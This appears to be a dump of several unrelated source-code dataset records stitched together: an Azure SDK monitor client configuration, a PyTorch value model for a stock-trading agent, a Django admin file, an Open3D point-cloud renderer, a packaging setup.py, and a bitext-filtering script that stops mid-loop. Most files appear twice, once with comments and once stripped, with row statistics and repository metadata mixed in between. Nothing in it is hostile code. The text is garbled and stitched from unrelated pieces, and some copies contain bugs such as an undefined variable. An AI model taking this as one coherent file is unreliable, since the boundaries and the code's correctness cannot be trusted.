        # NOTE(review): the moniker says 'mgmt-eventhub' although this is the
        # monitor client -- presumably an autorest copy/paste artifact; confirm
        # before changing, as it only affects the User-Agent telemetry string.
        kwargs.setdefault('sdk_moniker', 'mgmt-eventhub/{}'.format(VERSION))
        self._configure(**kwargs)

    def _configure(
        self,
        **kwargs  # type: Any
    ):
        # type: (...) -> None
        # Assemble the standard Azure SDK pipeline policies; each one can be
        # overridden by passing the corresponding keyword argument.
        self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
        self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
        self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
        self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
        self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
        self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
        self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
        self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
        self.authentication_policy = kwargs.get('authentication_policy')
        # Fall back to bearer-token auth over the configured scopes when no
        # explicit authentication policy was provided.
        if self.credential and not self.authentication_policy:
            self.authentication_policy = policies.BearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
| 45.307692 | 129 | 0.681834 |
from typing import TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
if TYPE_CHECKING:
from typing import Any
from azure.core.credentials import TokenCredential
VERSION = "unknown"
class MonitorClientConfiguration(Configuration):
def __init__(
self,
credential,
**kwargs
):
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
super(MonitorClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.api_version = "2017-05-01-preview"
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'mgmt-eventhub/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs
):
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.BearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
| true | true |
7900fe6b4324af019ea50bf8ebbfcd7c728fc238 | 3,829 | py | Python | stock_trading_backend/agent/neural_network_model.py | iryzhkov/stock-trading-backend | 7161026b7b4deb78a934b66550c85a27c6b32933 | [
"MIT"
] | 1 | 2021-01-27T18:24:02.000Z | 2021-01-27T18:24:02.000Z | stock_trading_backend/agent/neural_network_model.py | iryzhkov/stock-trading-backend | 7161026b7b4deb78a934b66550c85a27c6b32933 | [
"MIT"
] | null | null | null | stock_trading_backend/agent/neural_network_model.py | iryzhkov/stock-trading-backend | 7161026b7b4deb78a934b66550c85a27c6b32933 | [
"MIT"
] | null | null | null | """Polynomial model class used by agents for building stuff.
"""
from torch import nn, optim
import torch
import torch.nn.functional as F
from stock_trading_backend.agent.model import Model
class NNModel(nn.Module):
    """Fully-connected torch network: Linear input layer, a stack of
    Linear+ReLU hidden blocks, and a single-output Linear head.
    """
    def __init__(self, num_inputs, num_hidden_layers, num_inner_features):
        """Build the layer stack.

        Args:
            num_inputs: dimensionality of the input vectors.
            num_hidden_layers: how many Linear+ReLU hidden blocks to stack.
            num_inner_features: width of every hidden layer.
        """
        super(NNModel, self).__init__()
        self.input_layer = nn.Linear(num_inputs, num_inner_features)
        # Alternating Linear / ReLU pairs, one pair per hidden layer.
        stack = [
            module
            for _ in range(num_hidden_layers)
            for module in (nn.Linear(num_inner_features, num_inner_features),
                           nn.ReLU())
        ]
        self.hidden_layers = nn.Sequential(*stack)
        self.output_layer = nn.Linear(num_inner_features, 1)
    def forward(self, input_tensor):
        """Map a (batch, num_inputs) tensor to a (batch, 1) prediction.

        Args:
            input_tensor: the input tensor.

        Returns:
            Tensor with model results.
        """
        hidden = F.relu(self.input_layer(input_tensor))
        return self.output_layer(self.hidden_layers(hidden))
class NeuralNetworkModel(Model):
    """Neural network model class.

    Wraps NNModel behind the agent Model interface; the underlying torch
    network is created lazily on first predict/train call, once the input
    dimensionality is known.
    """
    name = "neural_network_model"
    def __init__(self, learning_rate=1e-3, num_hidden_layers=1, num_inner_features=100):
        """Initializer for model class.

        Args:
            learning_rate: the learning rate of the model.
            num_hidden_layers: number of hidden layers in the network.
            num_inner_features: number of features in the hidden layers.
        """
        super(NeuralNetworkModel, self).__init__()
        # Created lazily in _init_model() once the input size is known.
        self.model = None
        self.optimizer = None
        self.criterion = nn.MSELoss()
        self.learning_rate = learning_rate
        self.num_hidden_layers = num_hidden_layers
        self.num_inner_features = num_inner_features
        # Unique identifier encoding the hyperparameters -- presumably used
        # for model persistence/lookup by the base class; confirm.
        self.id_str = "{}_{}_{}_{}".format(self.name, learning_rate, num_hidden_layers,
                                           num_inner_features)
    def _init_model(self, num_inputs):
        """Initializes the internal neural network model and its optimizer.

        Args:
            num_inputs: number of inputs that model will have.
        """
        self.model = NNModel(num_inputs, self.num_hidden_layers, self.num_inner_features)
        self.optimizer = optim.Adam(self.model.parameters(), lr=self.learning_rate)
    def _predict(self, state_action_tensor):
        """Use provided information to make a prediction.

        Args:
            state_action_tensor: pytorch tensor with state-action values.

        Returns:
            Predicted values for observation-action tensors (detached,
            flattened to 1-D).
        """
        if self.model is None:
            self._init_model(state_action_tensor.shape[1])
        return self.model(state_action_tensor).detach().reshape(-1)
    def _train(self, state_action_tensor, expected_values_tensor):
        """Train the model for 1 epoch.

        Args:
            state_action_tensor: pytorch tensor with state-action expected_values.
            expected_values_tensor: pytorch tensor with expected values for
                each state-action.

        Returns:
            The MSE loss before the optimizer step.
        """
        if self.model is None:
            self._init_model(state_action_tensor.shape[1])
        self.optimizer.zero_grad()
        output = self.model(state_action_tensor)
        loss = self.criterion(output, expected_values_tensor)
        # Capture the scalar loss before backprop mutates gradients.
        loss_value = loss.data.item()
        loss.backward()
        self.optimizer.step()
        return loss_value
| 34.495495 | 89 | 0.648211 | from torch import nn, optim
import torch
import torch.nn.functional as F
from stock_trading_backend.agent.model import Model
class NNModel(nn.Module):
def __init__(self, num_inputs, num_hidden_layers, num_inner_features):
super(NNModel, self).__init__()
self.input_layer = nn.Linear(num_inputs, num_inner_features)
hidden_layers = []
for _ in range(num_hidden_layers):
hidden_layers.append(nn.Linear(num_inner_features, num_inner_features))
hidden_layers.append(nn.ReLU())
self.hidden_layers = nn.Sequential(*hidden_layers)
self.output_layer = nn.Linear(num_inner_features, 1)
def forward(self, input_tensor):
output = F.relu(self.input_layer(input_tensor))
output = self.hidden_layers(output)
output = self.output_layer(output)
return output
class NeuralNetworkModel(Model):
name = "neural_network_model"
def __init__(self, learning_rate=1e-3, num_hidden_layers=1, num_inner_features=100):
super(NeuralNetworkModel, self).__init__()
self.model = None
self.optimizer = None
self.criterion = nn.MSELoss()
self.learning_rate = learning_rate
self.num_hidden_layers = num_hidden_layers
self.num_inner_features = num_inner_features
self.id_str = "{}_{}_{}_{}".format(self.name, learning_rate, num_hidden_layers,
num_inner_features)
def _init_model(self, num_inputs):
self.model = NNModel(num_inputs, self.num_hidden_layers, self.num_inner_features)
self.optimizer = optim.Adam(self.model.parameters(), lr=self.learning_rate)
def _predict(self, state_action_tensor):
if self.model is None:
self._init_model(state_action_tensor.shape[1])
return self.model(state_action_tensor).detach().reshape(-1)
def _train(self, state_action_tensor, expected_values_tensor):
if self.model is None:
self._init_model(state_action_tensor.shape[1])
self.optimizer.zero_grad()
output = self.model(state_action_tensor)
loss = self.criterion(output, expected_values_tensor)
loss_value = loss.data.item()
loss.backward()
self.optimizer.step()
return loss_value
| true | true |
7900fe9b95d5836ad1aeeb57c569a0de0caf1afb | 135 | py | Python | blog/admin.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | blog/admin.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | blog/admin.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Post, SurveyHistory
admin.site.register(Post)
admin.site.register(SurveyHistory)
| 22.5 | 39 | 0.82963 | from django.contrib import admin
from .models import Post, SurveyHistory
admin.site.register(Post)
admin.site.register(SurveyHistory)
| true | true |
7900fe9f1d10228fcdf29352cc73507faa9c2888 | 7,244 | py | Python | PointCloudClass/renderer.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | 3 | 2022-01-16T12:43:29.000Z | 2022-01-22T05:21:40.000Z | PointCloudClass/renderer.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | PointCloudClass/renderer.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import cv2
import numpy as np
from math import cos, sin, pi
from tqdm import tqdm
import open3d as o3d
def render(pointcloud_file_path, estimate_normals_radius, estimate_normals_max_nn):
    """Load a pointcloud, estimate its normals and show it in an open3d window.

    Args:
        pointcloud_file_path: path of the pointcloud file to load.
        estimate_normals_radius: search radius for hybrid KD-tree normal
            estimation.
        estimate_normals_max_nn: maximum number of neighbors considered
            per point during normal estimation.

    Returns:
        True. Blocks until the viewer window is closed.
    """
    pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
    pointcloud.estimate_normals(
        search_param=o3d.geometry.KDTreeSearchParamHybrid(
            radius=estimate_normals_radius,
            max_nn=estimate_normals_max_nn))
    o3d.visualization.draw_geometries([pointcloud])
    return True
class Renderer(object):
    """Renders a labeled pointcloud with open3d, interactively or to a video.

    NOTE(review): ``self.pointcloud_list``, ``self.d3_40_colors_rgb``,
    ``self.labeled_point_cluster_list`` and ``self.splitLabeledPoints`` are
    not defined in this class -- presumably provided by a subclass; confirm.
    """
    def __init__(self):
        # Visualizer handle; the actual window is created lazily.
        self.vis = o3d.visualization.Visualizer()
        # Orbit center (AABB center of the rendered cloud); set before rotateVis runs.
        self.render_center = None
        # Camera pose as [roll, pitch, yaw] euler angles in radians.
        self.euler_angle = [0, 0, 0]
        return
    def getRotationMatrixFromEulerAngle(self, euler_angle):
        """Return the 3x3 rotation matrix R_z @ R_y @ R_x for XYZ euler
        angles given in radians."""
        roll, pitch, yaw = euler_angle
        R_x = np.array([
            [1, 0, 0],
            [0, cos(roll), -sin(roll)],
            [0, sin(roll), cos(roll)]
        ])
        R_y = np.array([
            [cos(pitch), 0, sin(pitch)],
            [0, 1, 0],
            [-sin(pitch), 0, cos(pitch)]
        ])
        R_z = np.array([
            [cos(yaw), -sin(yaw), 0],
            [sin(yaw), cos(yaw), 0],
            [0, 0, 1]
        ])
        return np.dot(R_z, np.dot(R_y, R_x))
    def getRotateDirection(self, direction_vector, euler_angle):
        """Rotate ``direction_vector`` (normalized first) by ``euler_angle``.

        Returns the rotated unit vector as a list, or None (after printing
        an error) for a zero-length input vector.
        """
        np_direction_vector = np.array(direction_vector)
        direction_vector_norm = np.linalg.norm(np_direction_vector)
        if direction_vector_norm == 0:
            print("[ERROR][Renderer::getRotateDirection]")
            print("\t direction_vector_norm is 0!")
            return None
        np_unit_direction_vector = np_direction_vector / direction_vector_norm
        rotation_matrix = self.getRotationMatrixFromEulerAngle(euler_angle)
        return np.dot(rotation_matrix, np_unit_direction_vector).tolist()
    def rotateVis(self, delta_rotate_angle):
        """Advance the camera yaw by ``delta_rotate_angle`` degrees, keeping
        a fixed -10 degree pitch, and point the view at the render center."""
        self.euler_angle[0] = 0
        self.euler_angle[1] = -10 * pi / 180.0
        self.euler_angle[2] += delta_rotate_angle * pi / 180.0
        ctr = self.vis.get_view_control()
        ctr.set_front(self.getRotateDirection([1, 0, 0], self.euler_angle))
        ctr.set_up(self.getRotateDirection([0, 0, 1], self.euler_angle))
        ctr.set_lookat(self.render_center)
        return True
    def _buildRenderedPointCloud(self, scene_pointcloud_file_path):
        """Assemble one colored pointcloud from the labeled clusters.

        When ``scene_pointcloud_file_path`` is given, the scene is split via
        splitLabeledPoints and near-ground points of cluster 0 are added as
        a gray floor.
        """
        if scene_pointcloud_file_path is not None:
            print("start reading floor and wall...")
            self.splitLabeledPoints(scene_pointcloud_file_path)
        render_points = []
        render_colors = []
        print("start create rendered pointcloud...")
        for i in tqdm(range(len(self.pointcloud_list))):
            points = np.asarray(self.pointcloud_list[i].points).tolist()
            if len(points) == 0:
                continue
            # One palette color per cluster, cycling through the palette.
            color = self.d3_40_colors_rgb[i % len(self.d3_40_colors_rgb)] / 255.0
            for point in points:
                render_points.append(point)
                render_colors.append(color)
        if scene_pointcloud_file_path is not None:
            print("start create rendered floor...")
            for wall_point in tqdm(self.labeled_point_cluster_list[0]):
                # Keep only points at (almost) zero height, i.e. the floor.
                if abs(wall_point[2]) > 0.01:
                    continue
                render_points.append(wall_point)
                render_colors.append(np.array([132, 133, 135], dtype=np.uint8) / 255.0)
        rendered_pointcloud = o3d.geometry.PointCloud()
        rendered_pointcloud.points = o3d.utility.Vector3dVector(np.array(render_points))
        rendered_pointcloud.colors = o3d.utility.Vector3dVector(np.array(render_colors))
        return rendered_pointcloud
    def _setupWindow(self, rendered_pointcloud):
        """Open the render window (white background, 1px points) showing the cloud."""
        self.render_center = rendered_pointcloud.get_axis_aligned_bounding_box().get_center()
        self.vis.create_window(window_name="Open3D RenderObject")
        render_option = self.vis.get_render_option()
        render_option.background_color = np.array([1, 1, 1])
        render_option.point_size = 1
        self.vis.add_geometry(rendered_pointcloud)
        return True
    def render(self, show_labels, scene_pointcloud_file_path=None):
        """Show the labeled pointcloud in an orbiting interactive window.

        Press 'q' (with an OpenCV window focused) to quit.
        ``show_labels`` is currently unused; kept for interface compatibility.
        """
        delta_rotate_angle = 0.5
        rendered_pointcloud = self._buildRenderedPointCloud(scene_pointcloud_file_path)
        rendered_pointcloud.estimate_normals(
            search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))
        self._setupWindow(rendered_pointcloud)
        while True:
            self.rotateVis(delta_rotate_angle)
            self.vis.poll_events()
            self.vis.update_renderer()
            if ord('q') == cv2.waitKey(1):
                break
        self.vis.destroy_window()
        return True
    def saveRender(self, output_video_file_path, scene_pointcloud_file_path=None):
        """Record one full 360-degree orbit of the pointcloud to an MP4 file.

        BUGFIX: ``scene_pointcloud_file_path`` was referenced here but never
        defined, so every call raised NameError; it is now an optional
        parameter mirroring render().
        """
        fps = 30
        video_width = 1920
        video_height = 1080
        delta_rotate_angle = 0.5
        rendered_pointcloud = self._buildRenderedPointCloud(scene_pointcloud_file_path)
        self._setupWindow(rendered_pointcloud)
        fourcc = cv2.VideoWriter_fourcc(*'MP4V')
        out = cv2.VideoWriter(output_video_file_path, fourcc, fps, (video_width, video_height))
        for _ in range(int(360 / delta_rotate_angle)):
            self.rotateVis(delta_rotate_angle)
            self.vis.poll_events()
            self.vis.update_renderer()
            # Grab the frame as float RGB in [0, 1]; convert to 8-bit BGR for OpenCV.
            open3d_image = np.asarray(self.vis.capture_screen_float_buffer()) * 255.0
            cv_image = cv2.cvtColor(open3d_image, cv2.COLOR_RGB2BGR).astype(np.uint8)
            out.write(cv_image)
        self.vis.destroy_window()
        out.release()
        return True
| 37.148718 | 99 | 0.633214 |
import cv2
import numpy as np
from math import cos, sin, pi
from tqdm import tqdm
import open3d as o3d
def render(pointcloud_file_path, estimate_normals_radius, estimate_normals_max_nn):
pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(
radius=estimate_normals_radius,
max_nn=estimate_normals_max_nn))
o3d.visualization.draw_geometries([pointcloud])
return True
class Renderer(object):
def __init__(self):
self.vis = o3d.visualization.Visualizer()
self.render_center = None
self.euler_angle = [0, 0, 0]
return
def getRotationMatrixFromEulerAngle(self, euler_angle):
R_x = np.array([
[1, 0, 0],
[0, cos(euler_angle[0]), -sin(euler_angle[0])],
[0, sin(euler_angle[0]), cos(euler_angle[0])]
])
R_y = np.array([
[cos(euler_angle[1]), 0, sin(euler_angle[1])],
[0, 1, 0],
[-sin(euler_angle[1]), 0, cos(euler_angle[1])]
])
R_z = np.array([
[cos(euler_angle[2]), -sin(euler_angle[2]), 0],
[sin(euler_angle[2]), cos(euler_angle[2]), 0],
[0, 0, 1]
])
rotation_matrix = np.dot(R_z, np.dot(R_y, R_x))
return rotation_matrix
def getRotateDirection(self, direction_vector, euler_angle):
np_direction_vector = np.array(direction_vector)
direction_vector_norm = np.linalg.norm(np_direction_vector)
if direction_vector_norm == 0:
print("[ERROR][Renderer::getRotateDirection]")
print("\t direction_vector_norm is 0!")
return None
np_unit_direction_vector = np_direction_vector / direction_vector_norm
rotation_matrix = self.getRotationMatrixFromEulerAngle(euler_angle)
rotate_direction = np.dot(rotation_matrix, np_unit_direction_vector)
return rotate_direction.tolist()
def rotateVis(self, delta_rotate_angle):
self.euler_angle[0] = 0
self.euler_angle[1] = -10 * pi / 180.0
self.euler_angle[2] += delta_rotate_angle * pi / 180.0
ctr = self.vis.get_view_control()
front_direction = self.getRotateDirection(
[1, 0, 0], self.euler_angle)
ctr.set_front(front_direction)
up_direction = self.getRotateDirection(
[0, 0, 1], self.euler_angle)
ctr.set_up(up_direction)
ctr.set_lookat(self.render_center)
return True
def render(self, show_labels, scene_pointcloud_file_path=None):
delta_rotate_angle = 0.5
if scene_pointcloud_file_path is not None:
print("start reading floor and wall...")
self.splitLabeledPoints(scene_pointcloud_file_path)
rendered_pointcloud = o3d.geometry.PointCloud()
render_points = []
render_colors = []
print("start create rendered pointcloud...")
for i in tqdm(range(len(self.pointcloud_list))):
points = np.asarray(self.pointcloud_list[i].points).tolist()
if len(points) == 0:
continue
for point in points:
render_points.append(point)
render_colors.append(self.d3_40_colors_rgb[i % len(self.d3_40_colors_rgb)] / 255.0)
if scene_pointcloud_file_path is not None:
print("start create rendered floor...")
for wall_point in tqdm(self.labeled_point_cluster_list[0]):
if abs(wall_point[2]) > 0.01:
continue
render_points.append(wall_point)
render_colors.append(np.array([132, 133, 135], dtype=np.uint8) / 255.0)
rendered_pointcloud.points = o3d.utility.Vector3dVector(np.array(render_points))
rendered_pointcloud.colors = o3d.utility.Vector3dVector(np.array(render_colors))
rendered_pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))
self.render_center = rendered_pointcloud.get_axis_aligned_bounding_box().get_center()
self.vis.create_window(window_name="Open3D RenderObject")
render_option = self.vis.get_render_option()
render_option.background_color = np.array([1, 1, 1])
render_option.point_size = 1
self.vis.add_geometry(rendered_pointcloud)
while True:
self.rotateVis(delta_rotate_angle)
self.vis.poll_events()
self.vis.update_renderer()
if ord('q') == cv2.waitKey(1):
break
self.vis.destroy_window()
return True
def saveRender(self, output_video_file_path):
fps = 30
video_width = 1920
video_height = 1080
delta_rotate_angle = 0.5
if scene_pointcloud_file_path is not None:
print("start reading floor and wall...")
self.splitLabeledPoints(scene_pointcloud_file_path)
rendered_pointcloud = o3d.geometry.PointCloud()
render_points = []
render_colors = []
print("start create rendered pointcloud...")
for i in tqdm(range(len(self.pointcloud_list))):
points = np.asarray(self.pointcloud_list[i].points).tolist()
if len(points) == 0:
continue
for point in points:
render_points.append(point)
render_colors.append(self.d3_40_colors_rgb[i % len(self.d3_40_colors_rgb)] / 255.0)
if scene_pointcloud_file_path is not None:
print("start create rendered floor...")
for wall_point in tqdm(self.labeled_point_cluster_list[0]):
if abs(wall_point[2]) > 0.01:
continue
render_points.append(wall_point)
render_colors.append(np.array([132, 133, 135], dtype=np.uint8) / 255.0)
rendered_pointcloud.points = o3d.utility.Vector3dVector(np.array(render_points))
rendered_pointcloud.colors = o3d.utility.Vector3dVector(np.array(render_colors))
self.render_center = rendered_pointcloud.get_axis_aligned_bounding_box().get_center()
self.vis.create_window(window_name="Open3D RenderObject")
render_option = self.vis.get_render_option()
render_option.background_color = np.array([1, 1, 1])
render_option.point_size = 1
self.vis.add_geometry(rendered_pointcloud)
fourcc = cv2.VideoWriter_fourcc(*'MP4V')
out = cv2.VideoWriter(output_video_file_path, fourcc, fps, (video_width, video_height))
for i in range(int(360 / delta_rotate_angle)):
self.rotateVis(0.5)
self.vis.poll_events()
self.vis.update_renderer()
open3d_image = np.asarray(self.vis.capture_screen_float_buffer()) * 255.0
cv_image = cv2.cvtColor(open3d_image, cv2.COLOR_RGB2BGR).astype(np.uint8)
out.write(cv_image)
self.vis.destroy_window()
out.release()
return True
| true | true |
7900febf603696941fe6da7ea7814f90b83bef77 | 2,585 | py | Python | setup.py | zurk/ml-core | 4a85c7cc773657bb6dacf47dd8852197f9bb93c1 | [
"Apache-2.0"
] | null | null | null | setup.py | zurk/ml-core | 4a85c7cc773657bb6dacf47dd8852197f9bb93c1 | [
"Apache-2.0"
] | null | null | null | setup.py | zurk/ml-core | 4a85c7cc773657bb6dacf47dd8852197f9bb93c1 | [
"Apache-2.0"
] | null | null | null | from importlib.machinery import SourceFileLoader
import io
import os.path
from setuptools import find_packages, setup
# Load the package module straight from the source tree so the version can be
# read without installing the package first.
sourcedml = SourceFileLoader("sourced-ml-core", "./sourced/ml/core/__init__.py").load_module()
with io.open(os.path.join(os.path.dirname(__file__), "README.md"), encoding="utf-8") as f:
    long_description = f.read()
# Test packages (and their data files) ship only when explicitly requested
# through this environment variable.
include_tests = os.getenv("ML_CORE_SETUP_INCLUDE_TESTS", False)
exclude_packages = (("sourced.ml.core.tests", "sourced.ml.core.tests.source")
                    if not include_tests else ())
# TensorFlow is optional; the CPU or GPU flavor is chosen via extras_require.
tf_requires = ["tensorflow>=1.0,<1.14"]
tf_gpu_requires = ["tensorflow-gpu>=1.0,<1.14"]
package_data = {"": ["LICENSE.md", "README.md"]}
if include_tests:
    test_data_dirs = ["./asdf/*.asdf", "./swivel/*", "identifiers.csv.tar.gz"]
    package_data["sourced.ml.core.tests"] = test_data_dirs
setup(
    name="sourced-ml-core",
    description="Library containing the core algorithms for machine learning on source code. "
                "Provides API and tools to train and use models based "
                "on source code features extracted from Babelfish's UASTs.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    version=sourcedml.__version__,
    license="Apache 2.0",
    author="source{d}",
    author_email="machine-learning@sourced.tech",
    url="https://github.com/src-d/ml-core",
    download_url="https://github.com/src-d/ml-core",
    packages=find_packages(exclude=exclude_packages),
    namespace_packages=["sourced", "sourced.ml"],
    keywords=[
        "machine learning on source code",
        "word2vec",
        "id2vec",
        "github",
        "swivel",
        "bow",
        "bblfsh",
        "babelfish",
    ],
    install_requires=[
        "PyStemmer>=1.3,<2.0",
        "bblfsh>=3.1.0,<4.0",
        "modelforge>=0.14.1",
        "pygments>=2.2.0,<3.0",
        "keras>=2.0,<3.0",
        "scikit-learn>=0.21.1,<1.0",
        "tqdm>=4.20,<5.0",
    ],
    extras_require={"tf": tf_requires, "tf_gpu": tf_gpu_requires},
    tests_require=["docker>=3.6.0,<4.0"],
    package_data=package_data,
    python_requires=">=3.5",
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Environment :: Console",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: Apache Software License",
        "Operating System :: POSIX",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Topic :: Software Development :: Libraries",
    ],
)
| 35.410959 | 94 | 0.629014 | from importlib.machinery import SourceFileLoader
import io
import os.path
from setuptools import find_packages, setup
sourcedml = SourceFileLoader("sourced-ml-core", "./sourced/ml/core/__init__.py").load_module()
with io.open(os.path.join(os.path.dirname(__file__), "README.md"), encoding="utf-8") as f:
long_description = f.read()
include_tests = os.getenv("ML_CORE_SETUP_INCLUDE_TESTS", False)
exclude_packages = (("sourced.ml.core.tests", "sourced.ml.core.tests.source")
if not include_tests else ())
tf_requires = ["tensorflow>=1.0,<1.14"]
tf_gpu_requires = ["tensorflow-gpu>=1.0,<1.14"]
package_data = {"": ["LICENSE.md", "README.md"]}
if include_tests:
test_data_dirs = ["./asdf/*.asdf", "./swivel/*", "identifiers.csv.tar.gz"]
package_data["sourced.ml.core.tests"] = test_data_dirs
setup(
name="sourced-ml-core",
description="Library containing the core algorithms for machine learning on source code. "
"Provides API and tools to train and use models based "
"on source code features extracted from Babelfish's UASTs.",
long_description=long_description,
long_description_content_type="text/markdown",
version=sourcedml.__version__,
license="Apache 2.0",
author="source{d}",
author_email="machine-learning@sourced.tech",
url="https://github.com/src-d/ml-core",
download_url="https://github.com/src-d/ml-core",
packages=find_packages(exclude=exclude_packages),
namespace_packages=["sourced", "sourced.ml"],
keywords=[
"machine learning on source code",
"word2vec",
"id2vec",
"github",
"swivel",
"bow",
"bblfsh",
"babelfish",
],
install_requires=[
"PyStemmer>=1.3,<2.0",
"bblfsh>=3.1.0,<4.0",
"modelforge>=0.14.1",
"pygments>=2.2.0,<3.0",
"keras>=2.0,<3.0",
"scikit-learn>=0.21.1,<1.0",
"tqdm>=4.20,<5.0",
],
extras_require={"tf": tf_requires, "tf_gpu": tf_gpu_requires},
tests_require=["docker>=3.6.0,<4.0"],
package_data=package_data,
python_requires=">=3.5",
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Software Development :: Libraries",
],
)
| true | true |
790100c41c4e8118a8fa42a53463e0bcfccb4adf | 4,854 | py | Python | baseline/filter_hunalign_bitext.py | christianbuck/CorpusMining | f9248c3528a415a1e5af2c5a54a60c16cd79ff1d | [
"Apache-2.0"
] | 2 | 2017-02-08T14:37:01.000Z | 2017-02-08T17:25:39.000Z | baseline/filter_hunalign_bitext.py | christianbuck/CorpusMining | f9248c3528a415a1e5af2c5a54a60c16cd79ff1d | [
"Apache-2.0"
] | null | null | null | baseline/filter_hunalign_bitext.py | christianbuck/CorpusMining | f9248c3528a415a1e5af2c5a54a60c16cd79ff1d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import defaultdict
import argparse
import cld2
import langid
import sys
""" Removes some wrongly aligned pairs from hunalign output """
class LanguageIdentifier(object):
    """Wraps cld2 or langid.py to check a segment's language.

    Used to discard bitext pairs whose detected language contradicts the
    expected source/target language.
    """

    def __init__(self, use_cld2, valid_languages=None):
        # use_cld2: prefer the cld2 detector over langid.py.
        # valid_languages: iterable of language codes; stored lowercased.
        self.use_cld2 = use_cld2
        # BUG FIX: the default valid_languages=None used to crash the list
        # comprehension; treat None as "no restriction".
        self.valid_languages = [l.lower() for l in valid_languages] if valid_languages else []
        if not use_cld2 and valid_languages:
            langid.set_languages(self.valid_languages)

    def is_language(self, s, expected_lang):
        """ Check if the language of the segment cannot be reliably identified
        as another language. If another than the expected language is
        detected return False """
        expected_lang = expected_lang.lower()
        if self.valid_languages:
            assert expected_lang in self.valid_languages

        if self.use_cld2:
            reliable, _text_bytes, details = cld2.detect(
                s.encode("utf-8"),
                isPlainText=True,
                useFullLangTables=True,
                bestEffort=True)
            if reliable:
                # Accept only if cld2 saw the expected language with at
                # least 10% confidence among its candidates.
                for _lang, langcode, confidence, _score in details:
                    if langcode == expected_lang and confidence >= 10:
                        return True
                return False
            else:  # unreliable is still counted as OK
                return True
        else:
            # BUG FIX: previously classified the module-global ``source``
            # instead of the method argument ``s``.
            lang, confidence = langid.classify(s.lower())
            if lang != expected_lang and confidence > 0.9:
                # confidence for wrong language higher than 90%
                return False
            else:
                return True
if __name__ == "__main__":
    # CLI: read tab-separated bitext (optionally with a hunalign score
    # column), drop suspicious sentence pairs, write survivors to outfile
    # and, optionally, a per-reason report of everything dropped.
    parser = argparse.ArgumentParser()
    parser.add_argument('infile', nargs='?', type=argparse.FileType('r'),
                        default=sys.stdin)
    parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'),
                        default=sys.stdout)
    parser.add_argument('-deleted', help='file to keep deleted lines',
                        type=argparse.FileType('w'))
    parser.add_argument('-minscore', type=float, default=0,
                        help='minimum score from hunalign')
    parser.add_argument('-slang', '--lang1', help='source language',
                        dest='source_lang', default='en')
    parser.add_argument('-tlang', '--lang2', help='target language',
                        dest='target_lang', default='fr')
    parser.add_argument('-cld2', help='use CLD2 instead of langid.py',
                        action='store_true')
    args = parser.parse_args()
    # Buckets of removed pairs keyed by removal reason, for the report.
    deletions = defaultdict(list)
    n_written = 0
    n_total = 0
    lid = LanguageIdentifier(args.cld2, [args.source_lang, args.target_lang])
    for line in args.infile:
        n_total += 1
        score = 1.0  # default when the input has no hunalign score column
